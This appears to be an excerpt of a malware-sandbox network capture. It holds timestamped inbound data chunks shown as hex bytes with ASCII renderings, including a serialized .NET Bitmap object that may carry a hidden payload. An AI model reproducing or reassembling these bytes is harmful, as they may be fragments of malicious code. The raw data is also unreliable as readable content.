2021-10-16 14:53:40 UTC	5613	IN	Data Raw: 63 58 56 99 9e 45 42 b5 15 9b 72 bf da cb e8 f2 dc ac c1 44 d7 70 1f 7a 0b 34 70 f5 3e 4a cf 22 fd df 04 ef 62 ea 36 17 a1 89 71 84 f3 1e 4c 3d aa bb ca ec ed c0 6d fd 49 24 55 33 3a c2 0e 4a b8 8b 69 f5 39 63 98 8e 7a d8 22 89 81 cc 81 ba 31 23 c5 8c 95 cf aa e8 af b7 8c 6d 23 71 c2 3e af 97 81 c9 e4 31 4a f7 c8 9a 88 cf 3b 60 6c fd bf c9 3e 42 cf 9b 67 e8 f1 ff e0 4b 94 f4 e2 13 8f 65 64 5f cc 33 60 65 35 60 7e e3 49 be 00 da 80 1b fe e6 d5 93 61 c8 3b 83 bc 9d c4 c7 d6 e9 fb 36 eb 40 3e 21 62 65 fd 19 3e 50 f6 d2 fb 7b a3 29 62 fd 26 f9 64 fb 22 c2 b3 48 78 e5 8e 90 a9 76 e1 64 c3 e3 a4 b9 55 39 22 50 c6 e5 50 a9 9b 35 c6 e3 18 b9 18 38 4d 6e 7d c3 f1 5b 86 05 49 9c c1 1a 5f 98 dd 93 ff c8 51 8a a4 0f e9 2d e8 1b 5a f1 3a 41 ec 53 5c c1 a6 1a d9 92 3a Data Ascii: cXVEBrDpz4p>J"b6qL=mI$U3:Ji9cz"1#m#q>1J;`l>BgKed_3`e5`~Ia;6@>!be>P{)b&d"HxvdU9"PP58Mn}[I_Q-Z:AS\:
2021-10-16 14:53:40 UTC	5629	IN	Data Raw: 10 b1 80 ff 7c c6 c2 f8 1e 7d 90 a7 a3 a8 11 54 3a 30 e2 b0 b9 65 46 7f ca d0 22 74 bc 33 eb 69 94 d9 27 f4 33 c1 85 e7 cc 97 96 97 6c 6f 44 a8 0d 50 c4 6a c2 72 a2 b9 b8 ab 38 36 e2 fe e5 17 84 10 b7 8f 3f 83 79 21 72 39 34 41 a0 0c 18 68 26 02 dc 2f bc 88 88 6f d4 8f d6 d6 11 98 39 e0 4d a5 73 63 a1 05 63 f2 10 55 13 d9 96 eb 6b 03 84 66 be 31 d7 93 8f 1c 1d 4c 14 5d 42 d2 2c 93 fa d7 05 7c 94 36 73 4d 63 ee 16 eb 13 af 09 81 1a 17 1c a6 e4 f2 7d 78 28 2f 67 d1 bb 89 50 63 41 1e 09 3d 02 2b cd b7 46 5c b6 ee 2f bc 09 f5 01 29 24 eb 11 8f e4 82 98 48 a8 77 ac a2 82 cb 51 f6 14 85 ab d8 1a 04 74 94 d1 87 02 bf c8 1b 03 d3 5f dc 5c 7a 29 d8 96 8a b6 d0 2b 1c 0d 10 73 74 24 d7 26 cc 39 3c ac b3 94 90 56 6c 4b 97 9a 8f 08 88 85 c2 46 b1 54 a2 3d 3f 3f d9 a8 Data Ascii: \|}T:0eF"t3i'3loDPjr86?y!r94Ah&/o9MsccUkf1L]B,\|6sMc}x(/gPcA=+F\/)$HwQt_\z)+st$&9<VlKFT=??
2021-10-16 14:53:40 UTC	5645	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5661	IN	Data Raw: 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: stem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:40 UTC	5677	IN	Data Raw: 9a c8 e9 38 69 f8 8f a2 6f 0a 2e 70 74 01 29 1c 1c b2 24 8a bb 68 67 d9 04 cb 10 b4 fe 88 70 18 0f f3 66 dc 8f c2 30 0f d2 68 82 f8 a2 fe 6e 30 ab 6d b3 4f e5 f3 da f9 e1 b5 60 d6 7e f1 6d 2a 61 4e 9d 9c 25 c5 67 48 28 ba b4 b7 50 8a f3 87 da cd 2e fb 58 93 f8 f3 3c 05 c3 7c 94 14 80 a4 2e b6 d2 ff e2 51 ea 83 f2 45 1b c8 70 61 5b 88 ca cb fb 84 b7 e6 43 38 6b 68 11 73 b3 9b 80 fb e6 7c 74 51 4d c5 25 ac 6d e4 82 b1 3f e2 09 da 21 fe 6c f0 f9 8e 71 c0 2e a0 81 2c 71 dd ee 5d f2 fa cc e2 2d a1 39 6f df 5e 3d 0e c3 97 b9 4b 32 ef 09 b5 58 91 3a 00 c0 7e ca 74 e9 93 b9 1d a0 28 cd a9 8a 2c 04 49 e6 e5 26 d4 fa 95 e7 b8 34 a5 07 46 51 09 e6 16 1b dd c0 a5 ff c7 14 2d 8e 30 ad da 69 a4 7e 6c f6 9e 9f aa 55 7f b0 f1 e0 b7 16 11 dd 6d 92 93 57 23 7b 64 79 e0 3f Data Ascii: 8io.pt)$hgpf0hn0mO`~m*aN%gH(P.X<\|.QEpa[C8khs\|tQM%m?!lq.,q]-9o^=K2X:~t(,I&4FQ-0i~lUmW#{dy?
2021-10-16 14:53:40 UTC	5693	IN	Data Raw: c7 af 32 6c bd 2a 17 59 69 0b 53 2e c5 79 9f 27 7d f5 da 7b 3c 03 5b 9f 08 5f a1 ea 5f fa 53 10 4e d8 41 4f 17 7a dc 57 92 18 cf 56 02 06 64 f7 63 5f fc 65 55 90 31 ec 31 71 65 2a 9e 95 53 08 be 21 13 87 77 85 b2 75 cc be 51 81 1a 5e ae c5 6a 13 48 72 1f e2 9f 72 2f 52 c8 f1 b0 0a 9d 14 ac 48 02 61 f3 66 46 ae fc 4f a0 aa 8e 5c c5 69 7b 8f 28 38 89 61 c4 d6 f5 0f eb 97 d7 6d 1c bc 84 08 9a 5d 56 bf 17 68 8f 01 bf 2f 70 bf dd fd c0 06 81 59 1e fb f8 cb 54 e6 e1 d9 d2 15 41 e7 e4 35 62 ff b0 8b 45 0c ab e4 67 f2 1a 39 a7 29 37 5a 9a a0 5f 12 b0 9a d2 f3 1a 95 61 10 d7 14 9e 87 3b e1 76 de 6c d1 59 3b 7b 56 2a 3c 4c 15 88 a6 a3 d3 59 ad f9 23 70 cf fa fb 6d 6c a9 2f f1 91 21 c7 e9 ad 7d 75 73 b3 da ee 56 ed 91 14 76 fc e3 fe e6 f4 e1 6c 75 83 fe 26 06 e0 19 Data Ascii: 2lYiS.y'}{<[__SNAOzWVdc_eU11qeS!wuQ^jHrr/RHafFO\i{(8am]Vh/pYTA5bEg9)7Z_a;vlY;{V*<LY#pml/!}usVvlu&
2021-10-16 14:53:40 UTC	5709	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5725	IN	Data Raw: d1 5c 79 3a 76 17 91 fe f5 9f 5b 53 ad 84 5b 7d a3 f0 f4 3a 85 68 cc 90 43 99 5b 83 d4 5e 70 cc ad 73 2f 2d b4 a3 20 85 d8 07 dd 2a a3 d6 91 e5 27 cf c0 c4 b7 36 54 2c cc 19 93 cd 4a 5a 06 1a b0 96 71 a2 59 c1 f2 fe 47 f3 fe 27 16 1d 0f 34 f6 c1 5e bd 05 76 24 21 3d e6 d0 d5 9e bb a4 47 db 91 2b 54 54 07 5d e6 49 26 5a f7 24 bd de 17 73 ed f6 ea 6b 0a 68 2b 37 fe 7f a7 cc 9b 6c 49 5a 3a e1 27 73 03 d0 ef 5b f0 18 7a 8b 96 a9 53 86 e9 1e 60 9f 6d 3b c1 26 db a6 35 53 57 77 f6 8d 5f 43 30 07 49 a4 77 78 86 3a 55 2e a9 d8 63 80 fc 86 cd 19 1c 4e 0c c8 3a 1f d2 27 ac fc 4e 71 a4 d9 b2 45 01 96 1e 59 c5 d7 81 27 31 26 30 fc 39 aa 2c e6 c6 8f c1 70 4e 8a 80 10 2e ca 9a a1 fe c8 99 a8 c8 56 b6 ad 2b d8 3e 5b b6 6b a6 dc 30 88 6b e7 e3 d7 65 08 86 c5 fb eb 87 30 Data Ascii: \y:v[S[}:hC[^ps/- *'6T,JZqYG'4^v$!=G+TT]I&Z$skh+7lIZ:'s[zS`m;&5SWw_C0Iwx:U.cN:'NqEY'1&09,pN.V+>[k0ke0
2021-10-16 14:53:40 UTC	5741	IN	Data Raw: cd 6a 01 f4 bf 22 7d bb 79 14 1d 74 39 2d df 70 de 60 4d 39 99 16 40 cc c6 cb 97 6d 82 8c 70 84 48 c9 e0 7c 82 46 75 2d cb 1d 68 47 36 ec 71 3c 7b f8 ed 24 c2 c2 88 87 f1 c6 7d 2f 95 79 a1 31 07 53 fe b3 5a 73 73 06 8b 48 3f 10 14 ef bc fb c9 3f b8 7f 89 06 41 3d 6d 5f 58 7f 11 bc 02 5e ee 5d 9b 8b 24 3b 20 e7 38 19 16 d7 00 58 59 4e 7a ab d5 9b 17 c8 72 4f 08 50 c0 f8 6a 49 e8 10 94 94 d5 d7 a4 cb 17 99 d2 c8 9a 5b e2 37 d0 40 aa 72 69 d9 65 d8 07 85 ad 01 2b 77 3f ad cf d9 60 b4 c7 c8 26 ea 43 16 cb 3f b9 9d 07 34 9e 0c 99 78 97 ed 18 47 d6 9d d9 d2 5f 0a f5 0b dd 9d e3 2e dc ba 95 ae f7 fd 45 77 fe 21 f7 83 68 2e 7b 93 4a 3e b3 43 63 ad f5 b8 f8 09 98 dc 68 70 fb 40 2c e5 fd 1a 95 f3 57 91 49 bd b0 18 a2 d0 3c 77 ae 50 59 df 22 e7 98 40 76 c7 4b be f4 Data Ascii: j"}yt9-p`M9@mpH\|Fu-hG6q<{$}/y1SZssH??A=m_X^]$; 8XYNzrOPjI[7@rie+w?`&C?4xG_.Ew!h.{J>Cchp@,WI<wPY"@vK
2021-10-16 14:53:40 UTC	5757	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f bd c2 33 3c 22 dd 4b ed 3d 09 67 42 1a e0 a0 fb 97 82 a0 a8 04 98 c4 d2 05 f2 c9 e4 51 2a 7f f2 62 ea 28 ca b6 ef f5 f0 a6 3c 45 c8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: /3<"K=gBQ*b(<E
2021-10-16 14:53:40 UTC	5773	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5789	IN	Data Raw: e2 ee be c5 06 c0 b8 09 ff cc da c3 3e d1 82 67 5d 3e 17 11 5e 21 45 9f 13 82 25 15 a3 a2 7f be 9d ce 9c f2 23 98 99 1b 0e 23 27 d6 7f 09 ac 0b d1 c2 e6 89 4f 04 1c 57 21 93 92 89 a8 a4 03 36 5c ee d4 78 9c ee 56 4d 28 68 6e 71 c9 68 86 2b 2e 15 6a 06 f1 fc 30 50 b4 9e 1c 41 e7 82 58 09 75 b1 cf 63 04 cb 04 df a0 56 d4 5e 5a 3b df d3 ac fc 89 39 5c ce 4f cf d4 7b 9e e7 29 90 7c 16 da e4 36 d2 3e e6 93 92 6f 9d e9 7c ba 8d 7d aa 5b 70 9a 2e 7b 91 f0 55 b7 48 e2 36 e1 d9 50 6b 67 d7 d5 2e bb 0d 32 07 be 29 85 b4 5b 64 ff e7 75 57 4c 34 79 ae f2 45 84 a8 e9 a3 1f 73 ef 80 9d 5c 86 de 1d 32 0a e5 63 1e 34 f7 fb 4e 2a 01 cb bf 5f c9 f1 4d 72 8c 05 a9 01 de bc 9b 78 e2 6f 4e 9f 72 de 7a e9 b1 e6 3e 3d 79 50 1c 9c 4f a8 fe a3 10 06 3b fa 6b 41 17 cd 27 9c 81 39 Data Ascii: >g]>^!E%##'OW!6\xVM(hnqh+.j0PAXucV^Z;9\O{)\|6>o\|}[p.{UH6Pkg.2)[duWL4yEs\2c4N*_MrxoNrz>=yPO;kA'9
2021-10-16 14:53:40 UTC	5805	IN	Data Raw: 4f b3 21 38 17 be c7 f3 5b 2e fb 80 06 6b 84 69 1f 7d d7 bf 0c 28 4d 7f f6 77 b5 75 dd 34 2a a6 8a a1 ed df a3 47 34 35 a3 48 38 46 b3 81 b4 ec e1 eb ac 0f 06 36 e2 e3 c2 94 8b cc 5e aa 21 70 de 15 b3 48 aa 59 9d c3 29 28 34 5e 8c 78 cf 9b 85 09 14 5a 0d 05 d2 f2 e5 7a 65 8d 3f 19 35 f9 d9 31 8f 6e e7 a0 60 72 b5 ff 05 b7 dc 4c 4f 12 81 fd dd b8 d2 69 be 4e 67 00 c5 84 36 3d 73 dd af f5 b5 58 75 5d 8e b9 4b a8 7b ff 1d 63 2e f7 ec 20 8f 86 e6 fe 60 bc e1 1a 8f 45 70 8a 5f d5 37 db 0e 28 e9 ea e8 d4 5d fd d2 81 82 f5 d4 0a e1 9e 76 81 8f 70 97 db 49 71 2b d6 76 7c 03 9b 6c e2 6f 35 17 9b f1 da 45 b3 49 45 5d 5d db 2f c5 f6 01 e8 3d a8 c1 17 e9 ec b0 58 56 ce 36 c8 85 6f 29 8a 4c 9c 74 f2 94 76 94 ed 84 b5 c9 b0 58 b6 0a 0a 85 af ef fc 2b 0b 02 7c dd dc 21 Data Ascii: O!8[.ki}(Mwu4*G45H8F6^!pHY)(4^xZze?51n`rLOiNg6=sXu]K{c. `Ep_7(]vpIq+v\|lo5EIE]]/=XV6o)LtvX+\|!
2021-10-16 14:53:40 UTC	5809	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5825	IN	Data Raw: d9 1d 5c 1e cf c8 68 72 e4 c9 35 0c f1 d2 ff f1 c2 a6 f2 05 9d 5f ef 8b 8b 08 ca 02 e0 0d f3 80 12 b1 61 56 b1 ff 91 03 b9 07 75 4e fb 6c de de c0 6d e3 9b 83 19 b9 ed 21 66 08 ac 20 a7 2d 73 a2 03 32 7a 52 3c 1f c3 43 68 33 3a 09 91 d9 e8 47 44 cc d4 ce 45 da b2 25 3d 1f 30 c6 3a 65 a2 1d 33 2b af 71 32 8b b8 d0 d4 9b a0 e4 e9 65 4d 8e 1d 8a 75 78 5e e3 ae 68 44 e7 1e 9c 49 d3 2d ba 9b a4 49 7f 8c e8 73 91 f3 87 61 c9 6d d1 04 46 d8 b3 3a 2a 4a b5 a8 23 d4 a9 08 c4 07 14 0c bf e2 af 60 03 c9 1e cb db 06 15 9a 05 ad c1 d7 87 6e 3e 84 b6 18 64 1e c0 13 7f 53 72 6a cc 58 b3 53 0f 09 e8 e9 85 57 cb bd d6 43 d7 87 41 e9 da 1c d4 2c 6e e6 63 27 36 c7 22 37 f9 37 3d ea 53 3e 90 19 fc f1 b1 3c 8f e4 c5 9c 97 16 98 8e 1b 37 ee 4e db 0b ef 81 ae d8 8e dc 32 3b 87 Data Ascii: \hr5_aVuNlm!f -s2zR<Ch3:GDE%=0:e3+q2eMux^hDI-IsamF:*J#`n>dSrjXSWCA,nc'6"77=S><7N2;
2021-10-16 14:53:40 UTC	5841	IN	Data Raw: 2b cb d6 3f 1d dc f8 36 a2 4d bd 86 44 34 e4 5b d9 af 70 a7 c2 4e 6c 8f de b8 b4 84 fb 20 65 fb d2 f9 a1 58 f1 b8 57 1f b5 e3 85 b3 a6 24 3b bb f0 47 a0 30 57 7e 7f 48 a6 50 64 c3 e1 ac d1 cb aa 49 ea 0f 23 55 bc ab f6 08 7b 06 24 de a7 5a f9 13 cb 01 cf c9 fa 4d 31 42 43 d9 9c 3f ac 05 71 4e 07 a4 48 19 0d a8 3d 36 fd cb 7d 99 37 a9 32 79 f1 f1 da 7a 46 92 6f c8 f0 11 88 cd 01 30 c9 9b f0 2f 2f 82 db c5 9b 46 d3 4a 91 8a 7e f7 f7 4e 92 2a 2b c7 01 c7 fc 66 43 0e a7 b2 42 38 84 38 3d c2 2e 5f 30 4a 90 cd f1 4e e8 52 24 4c 14 a6 64 b9 cc e5 6d 95 05 db 6a 5b 3a a7 f9 0c 5b 1b be 5f 51 20 53 a5 60 1e 9a c1 62 4d 22 49 09 bd a5 70 d5 e3 4a 2d 41 6a 99 11 55 7a 84 6f 3f bd 98 eb 1a a2 11 b4 5a 86 dd 8d 7b df 1b 35 13 25 56 19 6a 42 60 f9 97 38 dc 90 6a f3 3a Data Ascii: +?6MD4[pNl eXW$;G0W~HPdI#U{$ZM1BC?qNH=6}72yzFo0//FJ~N*+fCB88=._0JNR$Ldmj[:[_Q S`bM"IpJ-AjUzo?Z{5%VjB`8j:
2021-10-16 14:53:40 UTC	5857	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 7e 36 80 85 11 bd 7d 80 76 d9 8b 27 83 d2 66 fc 5e 9f 21 6a f4 01 c7 0e db 59 96 77 dd a9 17 01 54 a6 fd 03 e5 bc 81 d0 f4 81 d5 b5 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: G~6}v'f^!jYwT
2021-10-16 14:53:40 UTC	5873	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5889	IN	Data Raw: 24 7a ab 2f c8 2b 78 f6 4e 5a a4 4f 2a 35 84 ad fc cf 0f 5b 10 d2 df a8 82 99 c3 b3 0f 60 e8 58 ab f0 e0 0f f1 fb 9f 29 67 d7 bc d5 76 d0 23 63 8a a2 3c 8f 5f cd 2f 35 db a5 b8 5c 4a 8f f4 3f 19 db ef 9c 8b 30 8a f7 69 bd 3a 12 15 d7 31 6a f8 08 dc 03 02 4b 15 36 12 64 5b 07 23 71 90 95 8b 4d a4 73 d8 8a 51 e5 1d 55 6f 9b 8d 89 5a 84 23 36 e3 c0 de a9 d9 03 b3 63 92 66 d2 ab 0b e3 b0 bb da bb 90 6e f6 0f 42 1b 9b 56 c8 d5 e7 a3 7d c8 ee ca 7e 83 26 39 14 36 ab 67 6e 79 6d 4e b6 e5 ec 08 53 8d f5 b2 84 c6 a2 e4 61 9f 2f 1b 3f 22 d0 58 f4 55 f2 39 b4 97 86 bf e4 28 25 57 e2 6f 79 b9 94 eb 0b 8f c6 a6 e4 fc 72 18 26 e8 e3 f1 d9 16 0a 14 1d e4 bb a7 bf aa 27 32 05 93 2a 39 9a ed 3f 9e 3f 29 ad dd d5 4a 29 13 12 63 88 b1 70 13 5a 04 19 2e 8a af d8 64 a8 51 be Data Ascii: $z/+xNZO5[`X)gv#c<_/5\J?0i:1jK6d[#qMsQUoZ#6cfnBV}~&96gnymNSa/?"XU9(%Woyr&'29??)J)cpZ.dQ
2021-10-16 14:53:40 UTC	5905	IN	Data Raw: 59 d7 48 0e cf e6 ee 67 00 31 1d 19 89 dd 23 9f 5b 31 7d 6b 60 ff 73 16 b3 5c 1c bb 91 0e 88 7d 3b f7 07 65 32 d7 ca 31 af 3d 19 65 4b a3 e8 88 a2 98 2d 20 87 ba c3 95 2d c7 2d cc 50 a4 20 8d d3 1a e0 df 6d ca 57 1c 60 5c 3d ff d0 92 41 a7 c6 55 ed 65 fc 07 52 11 58 ab 0d 24 e1 2c a3 bf 82 c6 dc 10 9f fa 89 3b 89 9e 42 9b a7 b9 0d f8 48 9c e9 d9 58 4a f6 cd f7 71 74 27 47 47 74 82 bf d7 84 fa dd 0d 34 69 27 60 23 25 a8 64 f0 08 09 e3 7b b2 6d 0a 70 64 46 51 fd 17 3c 4e 46 82 bd 66 b3 7e 61 73 0a 44 26 d3 1f d7 f5 b3 c3 b8 ed 9e e9 a9 5c c3 0c 12 58 eb 76 7d ba ca 44 4b 77 3b f3 29 71 a1 4a 67 22 bb 38 65 ad 2d 9d e6 60 4f 10 de a3 2f a9 da bc 8b 58 9e f2 a4 43 d1 d0 3d e6 4e 6a 28 52 14 e4 ad f6 ca dd 1e 9d f1 e6 d5 cb f5 1e 32 b0 aa 6a 1c 3e 75 fc a3 e4 Data Ascii: YHg1#[1}k`s\};e21=eK- --P mW`\=AUeRX$,;BHXJqt'GGt4i'`#%d{mpdFQ<NFf~asD&\Xv}DKw;)qJg"8e-`O/XC=Nj(R2j>u
2021-10-16 14:53:40 UTC	5921	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:40 UTC	5937	IN	Data Raw: fa 92 4f 43 70 b1 88 b6 d0 a1 f7 ed 54 49 27 08 29 59 ec 6d 58 b9 d7 0e be 41 af a0 ae b5 22 18 81 88 e4 75 e4 07 5a 5f 89 34 e1 85 2e 9e 4a c8 08 d9 6a b2 27 04 35 79 8f ed 4e 5f c0 bf dc c4 b0 a6 3c 35 5a 3b 42 27 04 4b 31 0a 2e 28 2f 51 05 6b 34 de fd c5 7d bb 85 2d 8c 0e 63 17 df 52 db 7b d4 25 e7 7e 06 ce b0 75 39 c4 84 0f 3e 48 e6 9b 6d 29 12 6b 4f 07 9e 6d c3 8a 15 dc b2 47 7c df d6 31 5c c9 bd f2 b0 b6 2c 48 ba 1c 79 6c 8b 3f 9a 6a d4 f2 62 6b da 7f 1d 69 56 b9 63 12 68 2f 5b 45 10 7e 44 d2 8f 7d 1a 3e e4 fa 7d 29 d5 be 5f d2 4f 75 c7 99 7e aa f3 07 44 83 ce 85 f4 c3 cf b4 c6 0f c3 14 e8 e5 25 15 1f 52 bd 9e 16 fc 95 ba a9 e0 e7 2d 99 e9 f2 10 6c 37 18 ca 8b 14 5f 09 1f 69 39 36 2f 68 7a d0 70 d5 f1 8d 97 dd 5f a8 c0 2a 86 4f 73 a7 bc ef 29 33 a2 Data Ascii: OCpTI')YmXA"uZ_4.Jj'5yN_<5Z;B'K1.(/Qk4}-cR{%~u9>Hm)kOmG\|1\,Hyl?jbkiVch/[E~D}>})_Ou~D%R-l7_i96/hzp_*Os)3
